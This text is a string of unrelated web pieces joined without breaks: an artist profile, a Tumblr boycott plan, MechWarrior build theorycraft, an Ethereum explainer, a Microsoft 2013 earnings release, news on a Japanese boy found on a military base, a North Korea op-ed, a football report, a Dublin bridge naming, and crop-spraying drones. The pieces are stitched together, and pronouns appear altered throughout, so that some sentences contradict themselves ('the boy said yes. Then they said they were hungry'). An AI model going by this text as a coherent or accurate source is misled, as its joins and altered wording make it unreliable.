“…we set forth our intention to work collaboratively in an exploration of Immanuel Kant's essay ‘What is enlightenment'. It was a lofty project, and a beautiful proposal, where we would explore ‘why we make crap things with highbrow ideas.' Not us personally, but everybody and us… It would be too impertinent to suggest that by merely attempting this process we have resolved anything so lofty as our intentions and ambition desired, but I put it to you that maybe, just maybe, that's okay. This is not to excuse ourselves – you read me too literally. We like this shit. And thus maybe we should not seek to explain ourselves just too much, and instead ‘have courage to use your [our] own reason'. Or, as Kant paraphrased in the first paragraph of ‘What is enlightenment?', Sapere aude.
Kant. What a cunt.”
Seriously. How can you not love this dude?
For “Please Don't Break My Heart”, they sculpturally constructed the phrase “All The Time I Was Making This I Was Thinking Of You” from 100 sheets of mounting board they super-glue together. Standing 2 metres tall but only 12 centimetres deep, the precarious fragility of the whole piece was intentional.
With that in mind, the picture below is the only one they have of the completed piece as it appeared at the exhibition opening. That night someone bumped into it and the whole thing collapsed. Oddly enough, I think, knowing what it spelled out in the first place, the broken down version is even more beautiful. A wonderful physical adaption to the tenuous nature of the sentiment it once spelled out. I also wonder if maybe, having built it to a dimension that made it so easy to topple, this was Smith's secret intention the whole time.
For “All The Time I Was Making This I Was Thinking Of You”, part of the Studio Project 9 residency at Glasgow's Market Gallery, Smith spent 18 hours a day placing 600 hand-made paper flowers and 1200 leaves onto four large trees. Sitting in the “meadow” between the four trees is an angular block, lit from within, whose perforations spell out “Every day in every way I am getting better and better”.
On their site Smith says “What's it all about? The optimism, beauty and misplaced trust of striving to make Art contrasted with the puritan work ethic involved. Making a nice place to sit. Endeavour, arrogance, naivety, spontaneity, Dead Poets Society and art.”
Finally, in another project that sources from the deep well of the net's collective emotional concious, the appropriately titled “Google Image Search” is a video installation consisting of two monitors. One displayed a single word, and the other displayed the top 20 image results for that word from Google.
From the vast list of words used in the total 74-minute looped video, you can watch two of them right here: “Free” and “Freedom”.
For everyone's information:
The plan for the 17th, when the adult content ban comes in, is to protest.
To do that, we are making as much noise either side of the 17th as possible, and using the site as normal.
On the 17th, dead silence.
People are saying log off but what they really mean is don't open the site or the app.
But, on the 17th make as much noise as possible on every other platform. Tweet about it and post on facebook and instagram and everywhere else.
What this does are causes a massive dip in ad revenue for one single day. That does not make staff think ‘oh everyone's gone let's shut down.' What it actually makes them think is ‘oh shit people aren't happy and if people don't keep using our site we're out of money and out of jobs.'
A boycott reminds a company that the users (consumers) have the power to make their site (business) worthless with one single coordinated decision.
If you want to join in, here's what to do:
Do:
Close all open instances of the app and site on all your devices before the 17th
Make posts before and after the 17th on tumblr and other platforms, talking about why this ban is bad
Make posts on other sites during the 17th. Flood the official tumblr staff Twitter and facebook with your anger and your opinion
Come back on the 18th and check in
Don't:
Delete the app from your phone (this doesn't affect their revenue and since it's off the store at the moment it'll be hard to get back)
Delete your account. I mean you can if you want to, but if you keep your account and don't use it you're saying to staff that there's still time to save it. If you delete it's hard work to come back.
Open the app or website (including specific blogs)
Make any posts (turn down/off your queue and make sure nothing is scheduled)
Go quiet elsewhere. Make it clear that this is just about tumblr, not a mass move away from all social media.
Remember: the execs don't care about anything but money. Shutting down the site means there's $0 further income from it. That's their last possible course of action. If we make it clear we're not happy, they'll have to do something or we can do more and more until it becomes too expensive.
Protests take commitment. They're a defiant action against a business that is doing something wrong. They will try to scare you into not participating, because they're scared. We hold all the power here, sometimes the execs just need to be reminded of that.
Print
Actions Print Author Topic: Javelin: Theorycraft, Discussion, Prediction (Read 3891 times) GMan129 Writer
Veteran
Extra info Javelin: Theorycraft, Discussion, Prediction
The jubilation was not without cause. It's been a year and a month since the last light mech was released (the Jenner IIC), and that one was announced in Summer 2015, so the Javelin represents the end to a year and a half of drought. Since the Jenner IIC, we have had 17 releases in the form of solo mechs, none lights (though a couple were super-fast mediums).
On top of all that, we have a price reduction! Sure, the Kodiak is still more cost-effective, but you're also getting enough extra goodies like premium time, mechbays, and camo nonsense to be "worth" over 15 bucks without adding in the mech (15 bucks of MC will get you just the 30 days of premium time with 500 MC left over). So it's still a pretty good bargain, even if it's not god-tier like the Kodiak. And it looks like this will be the last one-shot pre-order pack, with next one being a pack of 3060 mechs.
And this is all without talking about the mech itself. I'm not a light pilot, never have been really focused on that particular style, but it's still pretty neat looking. Aesthetically, humanoids are notorious for looking quite same-y, so that's a real risk here. Lights in particular don't have much real estate to differentiate themselves from each other, and the Wolfhound and Panther have already proven the issues with that. In spite of all that, I'm really digging the shape of this mech - perhaps it's just the pose it takes in the image, but it's bringing up thoughts of K-2SO and Bastion, with the sort of long-armed lankiness that we don't see much of in MWO.
In terms of performance, I'm about to talk about that in detail, but it at least seems interesting. Which is to say, very few of the builds are copy-pastes, and I think there are some unique options to consider.
Builds
JVN-10N
Endo, Ferro (stripped arms, 9 in head, max elsewhere), XL255 (148KPH), 2 JJs
4x Streak SRM2 with 3 tons of ammo
10 DHS, BAP Let's start off nice and easy. It's been a long time since I've made a streak boat without saying "eugh", and...well this one isn't great. But it fits nice, it's fast, and it should do its job. Plus, if this mech has Firestarter syndrome (no torso pitch/yaw), at least your streaks won't care.
JVN-10F
Endo, Ferro (stripped arms, 9 in head, max elsewhere), XL280 (162.5KPH), 2 JJs
4x Medium Pulse Laser
11 DHS 4 MPLs ain't much to write about, but that speed is pretty swell. If the hitboxes live up to the art, we could be looking at a spider-esque harasser, and 4 MPLs are plenty of firepower for that. I do think it'll need some weapon and acceleration quirks to make that work, though.
JVN-10P
Endo, Ferro (5 per arm, 17 in head, max elsewhere), XL255 (148KPH)
6x SRM2 with 4 tons of ammo
11 DHS This build gets me all tingly; I've always been an SRM2 fan and there are remarkably few mechs for which SRM2s make sense (the only one that comes to mind is a COM-1D). And honestly, they don't make that much sense here either - SRM2s are excruciatingly hot weapons, which means that 11 DHS is a nail in the coffin of this DPS mech. Still, can't wait to play it.
JVN-11A
Endo, Standard Armor (2 in LA, max elsewhere), XL255 (148KPH), 2 JJs
7x Small Pulse Laser
12 DHS This is probably the most copy-paste build of the bunch, and I don't place much confidence on it beating the FS9-A in a meaningful way (even that wouldn't be saying all that much anyways). All that said, I'm sure this mech will be just fine.
JVN-11B
Endo, Ferro (stripped arms, 9 in head, max elsewhere), XL225 (130.6KPH)
4x SRM4 with 3.5 tons of ammo
11 DHS, ECM The slowest build I'll be looking at, this one emphasizes stealth and power over manueverability. It doesn't even get access to jumpjets, but the ECM might make the difference, and it has by far the most offensive power of all the builds I've looked at seriously (though 6xSRM6 on the 10P could be hilarious...1 ton of armor, 1.5 tons of ammo, XL170 if you're curious).
JVN-HT
Endo, Ferro (5 in head, max elsewhere), XL255 (148KPH), 3 JJs
4x Medium Pulse Laser
11 DHS The Hero mech is not more powerful than the other mechs (at least, not until quirks), but adds a feature that the others don't get without making it OP. I'm pleased. Feel no obligation to dish out the moolah unless you really like the idea of arm-mounted lasers, or having only 2 missile hardpoints, or (and this is the best reason possible) you love the paint job.
Value
Obviously, this is the cheapest pack to date, and as I spoke about earlier, the bonus goodies that come with the base pack sell for more MC than you can buy with 15 bucks. So if you buy premium time in 1-month chunks at full price, this is a great deal! But realistically, buying this should be for the mech. The fact that this is the first light mech we've gotten in over a year confers a certain value to it already, but of course how you personally feel about the mech is subjective.
At the end of the day, there's not much more I can say about whether or not it makes sense to buy the pack. The question is more about whether or not to buy the Reinforcement pack and Hero. Of those, I'd say the Reinforcements look much more attractive, with the JVN-11B being a nasty-looking assassin, and the JVN-11A being a relate-able energy boat. The Hero, though, does not appeal much to me. At any rate, I'd wait until we see quirks to pick either up, since I don't think you actually miss out on anything by doing so.
Predictions
The Javelin will be a pretty decent light mech, maybe even Tier 2. While the mech won't be considered a power-house, it will have a bit of the Spider's ability to be a real nuisance and do more damage than you'd think. And if it gets decent quirks and a small stature, it could be the replacement for the over-sized 35 tonners.
Actions Print
No Guts No Galaxy
NGNG News and Discussions
NGNG News
Articles
Javelin: Theorycraft, Discussion, Prediction
Bitcoin and its related Blockchain introduced many people to the concept of a Blockchain back in October of 2008. A very strong use case for Bitcoin and Blockchain is 21.co, a silicon valley startup that is using Bitcoin to re-invent and optimize sales, marketing and research in the enterprise. Since then, we have heard about ‘Smart Contracts' built on Blockchain with much of the news related to the launch of Ethereum in July 2015. New entrants into this space include EOS and Tezos. Given the positive feedback that Brett and I received regarding industry use cases with Blockchain, we decided to extend the Blockchain and digital currency topic, focusing on Ethereum - the second most valuable cryptocurrency, behind Bitcoin.
Futurism The Ethereum Blockchain
What is Ethereum?
Ethereum is a decentralized platform that runs ‘smart contracts'. Smart contracts are computer protocols intended to facilitate, verify, or enforce the negotiation or performance of a contract. It was created and launched by Vitalik Buterin in 2014. Smart contracts store information about who owns what item(s), who should get paid and who should pay based on certain criteria including time frame, and Ethereum will automatically move funds based on those rules. An example could be property title or a car loan. Ethereum is an open source software.
“Ethereum is emerging as one of the most important blockchain platforms today. Ethereum started as an opensource software platform for decentralized applications, where stakeholders needed Ether the token to pay for computational steps and storage operations on the platform, said Joseph Lubin, Co-Founder of the Ethereum Project” --- World Economic Forum
Ethereum was designed to be a programmable blockchain - you can build apps on it - and those apps are referred to as distributed apps or dApps. Ethereum's blockchain is similar to the bitcoin blockchain, but was created to make it easy to digitize anything related to a contractual obligation.
Bitcoin's Blockchain primarily stores financial transactions.
Ethereum's Blockchain primarily stores contractual transactions.
Value and Scale of Ethereum - Ethereum is Turing-complete which, in very general terms, means that it can be used to program anything. ETH or Ether is the main currency of Ethereum network but Ethereum also provides the ability to create other tokens, shares or currency. Ethereum uses a concept of ‘gas' as a way to calculate a price for network computation or data storage. Gas is the price and the way to pay for the gas is through Ether.
The Ethereum blockchain has another amazing feature which is related to how it incents the network of computers used to validate the blockchain. Five times a minute a computer on the Ethereum network gets a reward of 5 ETH or Ether. The prize is stored in the blockchain. At the current price of approximately $180 per ETH, that is about $4500 per minute or about $6.5M per day.
Because Ethereum is based on code, the contracts are managed exactly per the rules in the code, without any human intervention required. To fuel the dapps, Ethereum uses Ether. Similar to the incentive of bitcoin, Ether incentivizes computers to validate the transactions for the dapps.
“According to Co-Founder Vitalik Buterin, the Foundation's core tasks include (a) research on the next version of Ethereum protocol and standards; (b) co-development and maintenance of the six different clients such as C++ and Go; and (c) community outreach to both newcomers and existing community members, publishing transcript of core developer calls, promoting developer events and keeping channels of communications open.” --- World Economic Forum
Ethereum is a major game changer when you think about how many inefficient, manual or highly people-dependent processes exist related to contracts.
What are smart contracts?
Smart contracts allow someone to programmatically create an agreement or contract between multiple people that contain decisions, store information, can be time-based in the sense that conditions are met according to a time schedule, specific actions can execute based on contract logic, can have an associated validation incentive through the disbursement of tokens/coins and can have a payout or payouts based on certain conditions.
As Vitalik Buterin says, “a smart contract is a mechanism involving digital assets and two or more parties, where some or all of the parties put assets in and assets are automatically redistributed among those parties according to a formula based on certain data that is not known at the time the contract is initiated.”
Creating these smart contracts on a blockchain mean that they benefit from the advantages of blockchain which include decentralization (no central controlling entity), distribution (a network of computers), security and incentives to participants who validate the transactions.
What are decentralized apps or dApps?
An example of decentralized apps are apps that are built using Blockchain. The backend of a dApp runs on a decentralized network of servers (versus servers controlled by one entity) and could be using smart contracts. The apps built on Ethereum are open referred to as dApps.
Why can't we just create smart contracts using bitcoin blockchain?
You could program smart contracts using bitcoin but it's much more difficult than using something like Ethereum. Bitcoin has a very limited scripting language.
Vitalik Buterin, the creator of Ethereum, explains in a Andreessen Horowitz podcast, that they moved towards a more generic protocol when they realized that they needed to create a Blockchain with no features - no specific transaction types. They built Ethereum to be a very generic architecture based on code so that a person could build whatever they want. You can define state, rules, modifications, etc and therefore you can code anything. Ethereum allows for a more complex set of rules so you could integrate things like IoT devices and non-financial applications.
You can program Ethereum using Solidity which is a ‘contract-oriented, high-level language whose syntax is similar to that of JavaScript and it is designed to target the Ethereum Virtual Machine (EVM).' Remix is a browser-based Integrated Development Environment that has an integrated compiler and Solidity runtime environment without server side components.
What are examples of dApps that are built on Ethereum?
Etherisc is creating Ethereum smart contracts to build decentralized insurance applications to make the purchase and sale of insurance more cost effective and provide greater transparency into the insurance industry. Investors are able to buy and trade a decentralized insurance portfolio. Imagine a completely decentralized insurance agency.
uPort is “an open source software project to establish a global, unified, sovereign identity system for people, businesses, organizations, devices, and bots”. uPort is an identity solution built on Ethereum smart contracts. Identities can be for individuals, devices, entities or institutions. Identities are self-sovereign which means that the owned and managed by the creator. uPort can digitally sign and verify claims, actions or transactions.
Gnosis is “crowd sourced wisdom” and built on Ethereum. It is a platform on which you can build apps for industries such as insurance, sales and finance - anything related to prediction markets which ultimately help you make better decisions. Specific applications include hedging risk, incentivizing behavior, forecasting weather and election results.
Ethlance is a Ethereum smart contract based freelancing solution. You can create jobs or apply for jobs using Ethlance.
Aragon is a dApp focused on two main challenges related to decentralized organizations. The first challenge is upgradeability and the second is decentralized arbitration. Aragon implements basic features of an organization like a cap table, token transfers, voting, role assignments, fundraising, and accounting.
Ujo is a music platform built on Ethereum. It leverages uPort for Identity and provides licensing and payments through Ethereum smart contracts.
Golem, which was funded in November 2016, is creating a global market for idle computer power. Basically you can sell your idle computer cycles to someone else. Golem leverages the Ethereum blockchain as a smart contract. The Golem Project describes itself as “Airbnb for computers. Rent your unused CPU/GPU cycles and get paid in cryptocurrency. A decentralized network powering true cloud computing.”
Swarm is focused on “serverless hosting incentivized peer-to-peer storage and content distribution. The primary objective of Swarm is to provide a decentralized and redundant store of Ethereum's public record, in particular to store and distribute dapp code and data as well as block chain data.”
Ethereum Computation Market is “The computation market is a service for Ethereum that allows for verifiable off-chain execution of computations that would be otherwise prohibitively expensive to execute within the EVM.” In general terms, ECM allows someone to pay someone else to execute a calculation outside of the Ethereum network and then provide the results of that calculation back to the Ethereum network, where it will be validated. This provides a less expensive alternative to performing complex calculations directly on the Ethereum network, since each execution of code on the Ethereum blockchain has a charge associated.
TrueBit provides ‘a scalable verification solution for Blockchains'. As described in their white paper, “Our new system consists of a financial incentive layer atop a dispute resolution layer where the latter takes form of a versatile ‘verification game.'” In general terms, TrueBit outsources computation by allowing anyone to request a computation and someone else provides the result of that computation as well as being rewarded for that result. TrueBit is an Ethereum smart contract.
MakerDAO is an Ethereum smart contract that provides a less volatile coin, a stablecoin called Sai (first version was called Dai), that is tied to the value of the US dollar. There is also an exchange called Oasis, which is built using Ethereum smart contracts, is fully autonomous and has zero fees. This may be one of the most radical example of leveraging Ethereum smart contracts - imagine being able to completely decentralize our financial exchanges, leveraging Ethereum's distributed network to ensure validity of exchange transactions, without any person needing to be involved.
What are Ethereum browsers? Ethereum is its own network of computers. According to ethernodes.org, there are approximately 23,680 Ethereum nodes in the global network. In order to easily access the Ethereum network and the associated dApps, there are a number of Ethereum network browsers that you can use: Mist, Parity, Meta Mask (a Chrome browser extension) and Status.
Scaling Ethereum to billions of users - According to Fred Ehrsam, previously co-founder @Coinbase and a trader @GoldmanSachs, there are two necessary steps: 1. Having all of the necessary parts of the dApp developer stack. and 2. Scalability of these components.
Fred Ehrsam Scaling Ethereum
“Facebook as a measuring stick - Let's do the math on running something like Facebook. Facebook handles about 175k requests per second (900k users on the site in any given minute, assume an action is taken every 5 seconds). And this probably doesn't include API requests, which are a better analogue and probably 3–4x higher. At the moment, Ethereum can handle about 13 transactions per second, which cuts in half to about 7 transactions per second for tokens (4.7m gas limit, 21k avg gas price for standard txn = ~220 standard txns every block, current avg block time 17s = 13 txns/sec, gas requirement roughly doubles for token transactions). And this doesn't include more expensive smart contract execution.” — Fred Ehrsam
According to Coindesk, the overall market cap for digital currencies has fallen from $115 billion to $61 billion in a month. There are a lot of speculation for the digital currency value drop in the past weeks, including simple market adjustments. This is not a new phenomenon, meaning digital currencies have had 7 years of price fluctuations. That said, don't bet against blockchain, Bitcoin, Ethereum or other crypto-currencies. Don't forget the developer that paid 10,000 Bitcoins for two pizzas in 2010 - at today's price, that's $20 million dollars for two pizzas.
Blockchain could power the next generation Internet and Ethereum has the potential to be a significant part of decentralized cyrptocurrencies, smart contracts and how businesses will reinvent themselves through an entirely new set of capabilities born from new business model innovation.
Lucas Jan
Some of Oregon's most colorful hills could see increased protections under legislation introduced Thursday.
Oregon Senator Jeff Merkley is proposing to create 58,000 new acres of Wilderness covering the Painted Hills and Sutton Mountain. The area is located northeast of Prineville in Eastern Oregon.
The bill also proposes a 2000-acre land transfer from the Bureau of Land Management to Wheeler County for economic development projects, like a new RV park.
Office of Senator of Jeff Merkley
ldquo;This is a pretty good example of environmental preservation and economic growth operating hand in hand,” Merkley said on a call with reporters. They said the designation would boost tourism in the area.
The proposed wilderness area is currently managed by the BLM, and is an active livestock grazing area. Grazing could continue if Congress approves the legislation, but activities like road-building and motorized recreation would be prohibited.
The proposal has the support of the Wheeler County Government and the nearby town of Mitchell.
Show full PR text
Microsoft Reports Record First-Quarter Revenue of $18.53 Billion
Robust enterprise sales and improving consumer demand drive broad-based growth.
REDMOND, Wash. - October 24, 2013 - Microsoft Corp. today announced revenue of $18.53 billion for the quarter ended September 30, 2013. Gross margin, operating income, net income, and diluted earnings per share for the quarter were $13.42 billion, $6.33 billion, $5.24 billion, and $0.62 per share.
These financial results reflect the deferral of $113 million of revenue primarily related to Windows 8.1 Pre-sales. All growth comparisons in the press release relate to the corresponding period in the last fiscal year, unless otherwise noted.
The following table reconciles these financial results reported in accordance with generally accepted accounting principles (GAAP) to non-GAAP financial results. We have provided this non-GAAP financial information to aid investors in better understanding the company's performance.
Three Months Ended September 30, Percentage Change (In millions, except per share amounts and percentages) Revenue Operating income Diluted EPS Revenue Operating income Diluted EPS 2012 As reported (GAAP) $16,008 $5,308 $0.53 Revenue deferred for Windows Upgrade Offer, Windows 8 Pre-sales, and Office Offer $1,356 $1,356 $0.13 2012 As adjusted (non-GAAP) $17,364 $6,664 $0.65 2013 As reported (GAAP) $18,529 $6,334 $0.62 16% 19% 17% Revenue deferred primarily related to Windows 8.1 Pre-sales $113 $113 $0.01 2013 As adjusted (non-GAAP) $18,642 $6,447 $0.63 7% (3)% (3)%
"Our devices and services transformation is progressing and we are launching a wide range of compelling products and experiences this fall for both business and consumers," said Steve Ballmer, chief executive officer at Microsoft. "Our new commercial services will help us continue to outgrow the enterprise market, and we are seeing lots of consumer excitement for Xbox One, Surface 2 and Surface Pro 2, and the full spectrum of Windows 8.1 and Windows Phone devices."
"We saw strong focus across our teams, generating record first-quarter revenue even as we navigate a fundamental business transition. Our enterprise renewals were very healthy and our devices and consumer business continued to improve," said Amy Hood, chief financial officer at Microsoft. "We are making strategic investments in areas like technological innovation, supply chain management, and global cloud operations to build for the future and create long-term shareholder value."
Devices and Consumer revenue grew 4% to $7.46 billion.
· Windows OEM revenue declined 7%; Windows Pro revenue grew for the second consecutive quarter.
· Surface revenue grew to $400 million with sequential growth in revenue and units sold over the prior quarter.
· Search advertising revenue grew 47% driven by an increase in revenue per search and volume.
Commercial revenue grew 10% to $11.20 billion.
· SQL Server revenue grew double-digits, with SQL Server Premium revenue growing more than 30%.
· Lync, SharePoint, and Exchange, our productivity server offerings, collectively grew double-digits.
· Commercial cloud revenue grew 103%.
"We continue to execute well across our businesses and we are seeing robust demand for our enterprise products and cloud services. Strong customer adoption of Office 365, Azure, and Dynamics CRM Online is accelerating our business transition to the cloud," said Kevin Turner, chief operating officer at Microsoft. "Our investments in SQL database platform, Hyper-V, System Center, and Lync are driving market share gains as these comprehensive solutions enable customers to increase their insight and efficiency."
Business Outlook
Microsoft will provide forward-looking guidance in connection with this quarterly earnings announcement on its earnings conference call and webcast detailed below.
Webcast Details
Amy Hood, executive vice president and chief financial officer, Frank Brod, chief accounting officer, and Chris Suh, general manager of Investor Relations, will host a conference call and webcast at 2:30 p.m. PDT (5:30 p.m. EDT) today to discuss details of the company's performance for the quarter and certain forward-looking information. The session may be accessed at http://www.microsoft.com/investor. The webcast will be available for replay through the close of business on October 24, 2014.
NC Yamato's parents reportedly left them by the side of a road as punishment for throwing stones at cars
Seven-year-old Yamato Tanooka was discovered in a building on a Japanese military base nearly three miles from where they disappeared last Saturday. Their parents had reportedly left them by the side of a road as punishment for throwing stones at cars. The youngster survived on water from a tap and slept on a mattress for the entire duration of their ordeal. They were only discovered on Thursday morning when a serviceman walked into the building by chance.
A spokesperson for Japan's Self-Defence Forces said: “One of our soldiers was preparing for drills and opened the door of a building on the base, and there they are.” “When they asked ‘are you Yamato?' the boy said yes. Then they said they were hungry, so the soldier gave them some water, bread and riceballs.” The boy was taken to hospital for checks but was healthy except for low body temperature. Medics said they would be keeping them overnight as a precaution. Yamato's tearful father, Takayuki Tanooka, thanked rescuers for their efforts and apologised for causing trouble.
NHK WORLD The boy was taken to hospital for checks but was healthy except for low body temperature
They said: “We've reflected on what we did and it was really excessive.” They added: “We - well, we loved them before, but I hope to give them even more attention now." Yamato's parents first said they disappeared while they foraged for edible plants, but later told police they had left them by the road to discipline them after they threw stones at people and cars. They said when they drove back a few minutes later the boy had disappeared. The area is so remote that residents of the region say they rarely go through it.
NHK WORLD
NHK WORLD The youngster survived on water from a tap and slept on a mattress for the entire week
“We have pretty much exhausted all the things that we could do at the Security Council at this point,” said Nikki Haley on CNN's State of the Union on Sunday, referring to North Korea. “We wanted to be responsible and go through all diplomatic means to get their attention first,” the U.S. ambassador to the United Nations said. “If that doesn't work, General Mattis [Defense Secretary James Mattis] will take care of it.”
The comments, no off-the-cuff remarks, mirrored their words at a White House press briefing Friday, and National Security Adviser H.R. McMaster, standing next to Haley at that briefing, was even more explicit. “I think we ought to make clear what's different about this approach is, is that we're out of time,” they noted, referring to sanctions. “As Ambassador Haley said before, we've been kicking the can down the road, and we're out of road.”
When senior Trump administration officials talk about the end of diplomacy they raise the prospect of war. But have all measures short of war been exhausted?
CNN's Barbara Starr reported Saturday, “North Korea's latest ballistic missile test has renewed discussion at the highest levels of the Trump administration about how military force could be used to stop [North Korean Leader] Kim Jong-un's development of nuclear warheads and ballistic missiles.”
The war talk is the result of exasperation by American officials who see that their actions so far have not convinced Kim, the North Korean supremo, to slow down the testing of ballistic missiles and nuclear weapons.
Take Haley's CNN comment. Even as President Donald Trump, a U.N. skeptic, prepares to address the United Nations General Assembly, many Americans, viewing the nine ineffective sets of sanctions on North Korea since 2006, say the Security Council itself is broken.
But the Security Council is not “broken.” It was never designed to work in an era of disagreement among the five veto-wielding permanent members.
What is not working is the United States. Unfortunately, from administration to administration, American leaders have failed to use all the elements of American power. If China and Russia use their vetoes to frustrate efforts to disarm North Korea—and they do—it is because the United States has not been willing to coerce them into acting responsibly.
With regard to Moscow, recent American policymakers have been more worried about a weak Russia than a strong one. Therefore, they have opted for mild sanctions on Vladimir Putin's dangerous behavior. Ronald Reagan, at a time when the U.S. was far weaker than it is today and the Soviet Union was far stronger than Russia is now, used American economic might to end the Cold War. Putin today is able to bedevil the U.S. at the Security Council only because Americans are afraid of what happens if they move to take them down.
At the same time, the U.S. has not stopped the People's Republic of China. Washington has allowed Chinese banks, large and small, to launder money for the North Koreans for decades. Americans reportedly have permitted Chinese leaders to help Pyongyang transfer missiles to the Iranians. The White House did nothing when enterprises connected to the Chinese People's Liberation Army sold mobile launchers for the North's intercontinental ballistic missiles. The U.S. has not asked the Chinese, at least in public, how North Korea's most advanced missiles appear to be derived from China's Jl-1. And Washington acted as if it did not matter when Chinese businesses allegedly sold uranium hexafluoride, components, and equipment for the Kim regime's nuclear-weapons program.
No wonder the Chinese feel free to support their North Korean allies. U.S. policymakers, they can see, have been feckless. It is one thing for, say, Liechtenstein to fail to convince Beijing to do the right thing. It is quite another for the United States of America to fail to do so. American policymakers have simply failed to coerce Beijing, failed to leave it no choice but to join in the effort to disarm the Kims.
What can the United States do to China? It can declare its largest banks “primary money-laundering concerns” under Section 311 of the Patriot Act, thereby denying them the ability to transact business in the world's dominant currency. That would be essentially imposing a death sentence on the Chinese banking system and possibly China's economy, perhaps the Communist Party itself.
Trump can also remind China's leaders that U.S. Trade Representative Robert Lighthizer in the middle of last month formally initiated, pursuant to Section 301 of the Trade Act of 1974, an investigation into Chinese intellectual-property theft. A finding of such theft—virtually assured—can lead to the imposition of high across-the-board tariffs on Chinese goods.
And this month, the People's Bank of China, the central bank, appears to have driven the renminbi lower, an indication central technocrats are once again “manipulating” their currency as that is defined by U.S. law. That gives Trump another point of leverage.
The Chinese economy, debt-fueled for years, is particularly vulnerable, especially in the run-up to the historic 19th Communist Party Congress, which begins Oct. 18. General Secretary Xi Jinping, who seeks to grab unprecedented power, cannot afford to see a major disruption of relations with the United States at this sensitive time.
The Trump administration, with the series of actions it took in the last week of June, signaled it would move against China for its support for North Korea. For instance, the Treasury Department sawed off Bank of Dandong, a small Chinese financial institution, from the global economy due to its persistent money-laundering. The Chinese, unfortunately, have continued their support for the Norks at the Security Council.
So what should the United States do? It could just give up efforts to disarm Pyongyang, as James Clapper, the former director of national intelligence, suggested in widely reported comments to CNN last month. There is an air of defeatism in American policy circles these days.
The assumption among Clapper and others is that the U.S. can deter the North Koreans indefinitely. Perhaps Washington can do that and, at the same time, stop their sale of nuclear-weapons technology to Iran and make sure they do not begin merchandising thermonuclear devices to established weapons customers, some of them terrorist groups.
But perhaps deterrence is not possible. Kim Jong-un, who surely knows what Clapper and others are saying, is obviously defiant these days. And the core goal of the Kim regime—the basis of its legitimacy—is taking over the other Korea, the one governed from Seoul.
Kim, once confident about their nukes and the means to deliver them, will almost surely attempt to use the threat of war to break America's 64-year-old mutual-defense treaty with South Korea and get America's 28,500 service personnel off the peninsula. Once they accomplish that, they surely think they can intimidate the South into submission.
Kim has recently been talking about “final victory,” a reference to taking over the South. An overconfident despot could miscalculate and begin a chain of events spiraling into war.
Although Americans are confident in their “overwhelming” capabilities, as Trump's comments at Joint Base Andrews on Friday indicate, the North Koreans probably do not view it that way. They have long memories and they know they grabbed the Pueblo, an unarmed U.S. Navy reconnaissance vessel, from international waters in 1968 and held the crew for almost a year, killing one sailor and even getting an apology from the Johnson administration. They no doubt recall they killed 31 Americans when, a year later, they shot down a Navy EC-121. In 1976, they hacked to death two U.S. Army officers in the Demilitarized Zone. In no case, did North Korea pay a price. So Americans do not look especially intimidating to the Kim family.
And although many Americans call Kim “irrational,” would it be crazy for them to think, now, that Washington will not stop him?
War, through miscalculation and misconception, is beginning to look probable, if not inevitable.
Lee Cattermole: Sunderland captain was sent off after the final whistle by referee Mike Dean
Martin O'Neill admits Lee Cattermole's red card was 'merited' after the Sunderland captain was punished after the final whistle in the 1-1 draw at Newcastle United.
Cattermole was shown a straight red card at full-time by referee Mike Dean after being deemed to have used foul and abusive language.
The midfielder had been booked inside the opening minute of the game at St James' Park following a challenge on Cheick Tiote and it was their 10th yellow card of the season.
Black Cats boss O'Neill did not quibble with Cattermole's red card, but did question whether Tiote should also still have been on the pitch after the Newcastle midfielder committed a string of fouls.
Mitigating circumstances
"I have gone in to see the referee and you can't be abusing the referee and therefore it has to be merited," O'Neill told ESPN.
"There were plenty of mitigating circumstances though. Tiote is a fine player but they were very lucky still to be on the field."
Sunderland had led at the home of their arch-rivals through Nicklas Bendtner's first-half penalty after Michael Turner had been fouled by Mike Williamson.
However, Stephane Sessegnon was sent off on 58 minutes for catching Tiote in the face and O'Neill had no complaints with that decision.
They added: "It's a sending-off offence and it hands the initiative to the opposition."
Visiting keeper Simon Mignolet then saved Demba Ba's penalty before an injury-time equaliser from substitute Shola Ameobi left O'Neill frustrated.
"I am very proud of the team and very disappointed to have dropped the points so late in the game," said O'Neill.
"We played brilliantly first half and deserved to be in front. But it is difficult to win a game with 10 men. We defended resolutely and it was a terrific effort."
Dublin City Council has voted to name the new Liffey bridge after activist Rosie Hackett.
The local authority selected a shortlist of five names from 85 official nominations for the bridge over the River Liffey at Marlborough Street.
Camogie legend Kay Mills was runner-up in the vote, followed by Alone founder Willie Bermingham, Dracula creator Bram Stoker, and the founder of the Legion of Mary, Frank Duff.
10,000 supporting submissions were made to the council, including emails, direct correspondence and petitions.
Rosie Hackett was a messenger in Jacob's biscuit factory and joined the Irish Transport and General Workers' Union when it was founded in 1909.
They encouraged women workers to join in the 1913 Lockout struggle and was dismissed from Jacob's.
They were a member of the Irish Citizen Army and served with Constance Markievicz.
In 1970, Hackett received a gold medal in recognition of their 60 years' service to the Irish trade union movement.
The three most recent bridges over the River Liffey were named after Samuel Beckett, Seán O'Casey and James Joyce.
Of the 23 bridges over the River Liffey, the Anna Livia bridge in Chapelizod is the only other to have an official female name.
The day when unmanned aerial vehicles (UAVs) are used for spraying fields in North America could be here sooner than we expect. In fact, for small acres, that day may have already arrived.
Several spraying units made by a Swift Current-based RotorSpray attracted plenty of attention at Farm Forum in Saskatoon earlier this month.
The UAVs were built and designed by Monty Allan, an entrepreneur with farm roots in southwest Saskatchewan. Through their company Chaos Choppers, Allan has been providing UAVs to RCMP and law enforcement agencies for surveillance and aerial photography. As part of the interview posted above, they say RotorSpray was formed after seeing the opportunities for UAVs in spraying.
While UAVs are already used in Japan for spraying small fields, RotorSpray's current technology is well-suited for controlling mosquito populations and spot-spraying weeds in areas on North American farms that are inaccessible for large field sprayers, explains Allan.
“Maybe your field V's out and you can't get your sprayer in there, it works pretty good for that, as well as hollows that are too wet to get into,” they say. “This year we had some issues with Canada thistle. (The patches) were really not very big, so it's not worth spraying the whole field. This can go in and do it in a few seconds.”
Related stories:
The largest unit currently made by RotorSpray has a 12 litre tank. The area it can cover with one load depends on concentration, application rates and battery life, but they use 6,000 square metres (just under 1.5 acres) as a rough estimate when asked.
Proper certification and training are required to fly the unmanned sprayers. While the current models are GPS-aided, Allan notes they're working with auto-pilot companies to completely remove the pilot from the in-air process.
“So what we'll do is upload its flight plan and send it on its way. It will figure out everything on its own and come back and land. You will really just change the battery and put more product in it,” they explain.
